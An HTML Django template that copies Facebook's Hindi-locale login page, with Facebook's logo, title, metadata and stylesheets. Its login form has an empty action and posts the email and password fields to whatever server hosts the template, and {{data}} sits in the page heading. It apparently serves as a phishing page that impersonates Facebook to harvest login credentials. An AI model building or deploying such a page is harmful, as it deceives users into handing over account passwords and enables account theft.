<!DOCTYPE html>
<html class="no_js" id="facebook" lang="hi">
 <head>
  <meta charset="utf-8"/>
  <meta content="default" id="meta_referrer" name="referrer"/>
  <style nonce="e0JDkgfN">
  </style>
  

  <title id="pageTitle">
   Facebook - login or sign up
  </title>
  <meta content="Facebook" property="og:site_name"/>
  <meta content="https://www.facebook.com/" property="og:url"/>
  <meta content="https://www.facebook.com/images/fb_icon_325x325.png" property="og:image"/>
  <meta content="hi_IN" property="og:locale"/>
  <meta content="www" property="og:locale:alternate"/>
  <meta content="es_LA" property="og:locale:alternate"/>
  <meta content="es_ES" property="og:locale:alternate"/>
  <meta content="fr_FR" property="og:locale:alternate"/>
  <meta content="it_IT" property="og:locale:alternate"/>
  <meta content="id_ID" property="og:locale:alternate"/>
  <meta content="th_TH" property="og:locale:alternate"/>
  <meta content="vi_VN" property="og:locale:alternate"/>
  <meta content="ko_KR" property="og:locale:alternate"/>
  <meta content="ja_JP" property="og:locale:alternate"/>
  <link href="https://m.facebook.com/" media="only screen and (max-width: 640px)" rel="alternate"/>
  <link href="https://m.facebook.com/" media="handheld" rel="alternate"/>
  <meta content="अपने दोस्तों, परिवार और परिचित लोगों से शेयर करना और कनेक्ट करना शुरू करने के लिए Facebook में लॉग इन करें." n               name="description"/>
  <link href="https://www.facebook.com/" rel="canonical"/>
  <link href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" rel="shortcut icon"/>
  <link data-bootloader-hash="Ouygn02" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/Dj-ykj6HWlU.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="b0DgQiA" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/XMFGr_lHUCS.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="Pud6B2Z" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/KxGJ10xTR_J.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="sDaXJql" href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/l/0,cross/oN-KTIVurPX.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="DcLQ9Pg" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
  <script data-bootloader-hash="xiNwIjT" nonce="e0JDkgfN" src="https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/VFP4kGgcLnk.js?_nc_x=Ij3Wp8lg5Kz">
 </head>
 <body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh x1 Locale_hi_IN" dir="ltr">
  <script nonce="e0JDkgfN" type="text/javascript">
   requireLazy(["bootstrapWebSession"],function(j){j(1683187649)})
  </script>
  <div class="_li" id="u_0_1_O3">
   <div class="uiContextualLayerParent" id="globalContainer">
    <div class="fb_content clearfix" id="content" role="main">
     <div>
      <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
       <div class="_8esk">
        <div class="_8esl">
         <div class="_8ice">
          <img alt="Facebook" class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"/>      
         </div>
         <h2 class="_8eso">
            Facebook helps you connect and share with the people in your life.
         </h2>
         <h1>{{data}}</h1>
        </div>
        <div class="_8esn">
         <div class="_8iep _8icy _9ahz _9ah-">
          <div class="_6luv _52jv">
           <form action=""  method="POST">
            {% csrf_token %}
            <input autocomplete="off" name="jazoest" type="hidden" value="21101"/>
            <input autocomplete="off" name="lsd" type="hidden" value="AVoZsfizk_g"/>
            <div>
             <div class="_6lux">
              <input aria-label="Email or Phone Number" autofocus="1" class="inputtext _55r1 _6luy" data-testid="royal_email"  name="email" placeholder="Email address or phone number" type="text"/>
             </div>
             <div class="_6lux">
              <div class="_6luy _55r1 _1kbt" id="passContainer">
               <input aria-label="Password" class="inputtext _55r1 _6luy _9npi" data-testid="royal_pass"  name="pass" placeholder="Password" type="password"/>
              </div>
             </div>
            </div>
            <input autocomplete="off" name="login_source" type="hidden" value="comet_headerless_login"/>
            <input autocomplete="off" name="next" type="hidden" value=""/>
            <div class="_6ltg">
             <button class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" data-testid="royal_login_button"  name="login" type="submit" value="1">
              Log in
             </button>
            </div>
            <div class="_6ltj">
             <a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjgzMTg3NjQ5LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">
              Forgotten password?
             </a>
            </div>
            <div class="_8icz">
            </div>
            <div class="_6ltg">
             <a ajaxify="/reg/spotlight/" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" data-testid="open-registration-form-button" href="#" id="u_0_0_iX" rel="async" role="button">
              Create New Account
             </a>
            </div>
           </form>
          </div>
          <div class="_58mk" id="reg_pages_msg">
            Create a Page for a celebrity, brand or business.
          </div>
         </div>
        </div>
       </div>
      </div>
     </div>
    </div>
    
   
 </body>
</html>